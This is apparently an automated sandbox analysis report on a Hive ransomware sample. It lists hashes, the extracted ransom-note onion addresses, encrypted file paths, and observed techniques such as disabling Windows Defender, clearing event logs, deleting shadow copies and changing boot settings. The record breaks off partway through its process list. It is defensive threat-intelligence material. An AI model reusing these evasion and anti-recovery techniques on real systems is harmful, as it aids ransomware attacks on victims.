Analysis
-
max time kernel
190s -
max time network
190s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 19:09
Static task
static1
Behavioral task
behavioral1
Sample
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
Resource
win7-en-20211208
General
-
Target
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
-
Size
2.7MB
-
MD5
524065ad3f33adcf7784f997d1089af4
-
SHA1
754e4389ce52c20629154313a8f19251b05f7e75
-
SHA256
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de
-
SHA512
87e52e975aafcb2256f8fb9aa10afbd78f70cdf0ccb399573087bc88044e289ac87678fcce34e29eb5af847ba910d29e3d5f4f72259ffe5e4e8cfce63b6ee69a
Malware Config
Extracted
C:\4a7Z_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 900 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2336 bcdedit.exe 4056 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-400.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Ujwl9iHmxUY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_rofJqU4pChc0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_eBOY3RO53TU0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\WideTile.scale-200.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\LargeLogo.scale-150_contrast-black.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msaddsr.dll.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_p_hMd8bINYQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl64.dlla.manifest.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_2bS6xc-Zhtk0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-32_altform-unplated.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\br_16x11.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_KZjNKXMH__k0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_8I_z7LzPC480.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-unplated.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\en-US\tokens_enUS.xml fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailLargeTile.scale-200.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_-SmSuwfIZ7o0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_FNpwLpapTCE0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\mask_corners.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\kr_60x42.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionSmallTile.scale-100.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-colorize.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-200_contrast-white.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\es-ES\msdaremr.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_a_yF1vnNIo40.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_t39-2RvCNxQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\173.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_11c.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-100.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_lme3EMl7dEk0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\4a7Z_HOW_TO_DECRYPT.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_tZSrHbt0DTQ0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\150.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_jm-jo4GFGZE0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\gp_16x11.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6767_32x32x32.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_BeforeEach_AfterEach.help.txt fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_P4yKFt4WcYo0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_9_-e26i7bQc0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\net.properties.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Z1McZNKVXJ00.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13d.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2653_20x20x32.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_4AY-Bf2BbW40.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_89vc6G0I_Ak0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_1mLJF-BP-z80.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.GrayF@2x.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_OnzH7VrFjMw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\MedTile.scale-200.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_T1x81R8qVuw0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\1.rsrc fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_contrast-white.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_dRrLmyzYvnY0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_3N9y7QZJV2U0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12h.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-200.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Road.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcor.dll.mui fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_s3nX6rd4P2c0.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16_altform-unplated.png fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\en-GB.mail.config fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Pgf5JfxbUZ40.7vilx fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1160 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2436 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exefc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exepid process 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 1112 powershell.exe 1112 powershell.exe 1112 powershell.exe 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2800 wevtutil.exe Token: SeBackupPrivilege 2800 wevtutil.exe Token: SeSecurityPrivilege 2212 wevtutil.exe Token: SeBackupPrivilege 2212 wevtutil.exe Token: SeSecurityPrivilege 736 wevtutil.exe Token: SeBackupPrivilege 736 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1820 wmic.exe Token: SeSecurityPrivilege 1820 wmic.exe Token: SeTakeOwnershipPrivilege 1820 wmic.exe Token: SeLoadDriverPrivilege 1820 wmic.exe Token: SeSystemProfilePrivilege 1820 wmic.exe Token: SeSystemtimePrivilege 1820 wmic.exe Token: SeProfSingleProcessPrivilege 1820 wmic.exe Token: SeIncBasePriorityPrivilege 1820 wmic.exe Token: SeCreatePagefilePrivilege 1820 wmic.exe Token: SeBackupPrivilege 1820 wmic.exe Token: SeRestorePrivilege 1820 wmic.exe Token: SeShutdownPrivilege 1820 wmic.exe Token: SeDebugPrivilege 1820 wmic.exe Token: SeSystemEnvironmentPrivilege 1820 wmic.exe Token: SeRemoteShutdownPrivilege 1820 wmic.exe Token: SeUndockPrivilege 1820 wmic.exe Token: SeManageVolumePrivilege 1820 wmic.exe Token: 33 1820 wmic.exe Token: 34 1820 wmic.exe Token: 35 1820 wmic.exe Token: 36 1820 wmic.exe Token: SeIncreaseQuotaPrivilege 2228 wmic.exe Token: SeSecurityPrivilege 2228 wmic.exe Token: SeTakeOwnershipPrivilege 2228 wmic.exe Token: SeLoadDriverPrivilege 2228 wmic.exe Token: SeSystemProfilePrivilege 2228 wmic.exe Token: SeSystemtimePrivilege 2228 wmic.exe Token: SeProfSingleProcessPrivilege 2228 wmic.exe Token: SeIncBasePriorityPrivilege 2228 wmic.exe Token: SeCreatePagefilePrivilege 2228 wmic.exe Token: SeBackupPrivilege 2228 wmic.exe Token: SeRestorePrivilege 2228 wmic.exe Token: SeShutdownPrivilege 2228 wmic.exe Token: SeDebugPrivilege 2228 wmic.exe Token: SeSystemEnvironmentPrivilege 2228 wmic.exe Token: SeRemoteShutdownPrivilege 2228 wmic.exe Token: SeUndockPrivilege 2228 wmic.exe Token: SeManageVolumePrivilege 2228 wmic.exe Token: 33 2228 wmic.exe Token: 34 2228 wmic.exe Token: 35 2228 wmic.exe Token: 36 2228 wmic.exe Token: SeIncreaseQuotaPrivilege 2228 wmic.exe Token: SeSecurityPrivilege 2228 wmic.exe Token: SeTakeOwnershipPrivilege 2228 wmic.exe Token: SeLoadDriverPrivilege 2228 wmic.exe Token: SeSystemProfilePrivilege 2228 wmic.exe Token: SeSystemtimePrivilege 2228 wmic.exe Token: SeProfSingleProcessPrivilege 2228 wmic.exe Token: SeIncBasePriorityPrivilege 2228 wmic.exe Token: SeCreatePagefilePrivilege 2228 wmic.exe Token: SeBackupPrivilege 2228 wmic.exe Token: SeRestorePrivilege 2228 wmic.exe Token: SeShutdownPrivilege 2228 wmic.exe Token: SeDebugPrivilege 2228 wmic.exe Token: SeSystemEnvironmentPrivilege 2228 wmic.exe Token: SeRemoteShutdownPrivilege 2228 wmic.exe Token: SeUndockPrivilege 2228 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1276 wrote to memory of 2312 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 2312 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 2312 wrote to memory of 924 2312 net.exe net1.exe PID 2312 wrote to memory of 924 2312 net.exe net1.exe PID 1276 wrote to memory of 504 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 504 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 504 wrote to memory of 2080 504 net.exe net1.exe PID 504 wrote to memory of 2080 504 net.exe net1.exe PID 1276 wrote to memory of 4064 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 4064 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 4064 wrote to memory of 4020 4064 net.exe net1.exe PID 4064 wrote to memory of 4020 4064 net.exe net1.exe PID 1276 wrote to memory of 1020 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 1020 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1020 wrote to memory of 776 1020 net.exe net1.exe PID 1020 wrote to memory of 776 1020 net.exe net1.exe PID 1276 wrote to memory of 1864 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 1864 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1864 wrote to memory of 2380 1864 net.exe net1.exe PID 1864 wrote to memory of 2380 1864 net.exe net1.exe PID 1276 wrote to memory of 2840 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 2840 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 2840 wrote to memory of 608 2840 net.exe net1.exe PID 2840 wrote to memory of 608 2840 net.exe net1.exe PID 1276 wrote to memory of 1200 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 1200 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1200 wrote to memory of 2716 1200 net.exe net1.exe PID 1200 wrote to memory of 2716 1200 net.exe net1.exe PID 1276 wrote to memory of 688 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 688 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 688 wrote to memory of 1580 688 net.exe net1.exe PID 688 wrote to memory of 1580 688 net.exe net1.exe PID 1276 wrote to memory of 916 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 1276 wrote to memory of 916 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe net.exe PID 916 wrote to memory of 2440 916 net.exe net1.exe PID 916 wrote to memory of 2440 916 net.exe net1.exe PID 1276 wrote to memory of 1428 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1428 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1452 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1452 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1584 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1584 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 2120 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 2120 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3180 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3180 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3272 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3272 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 2868 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 2868 1276 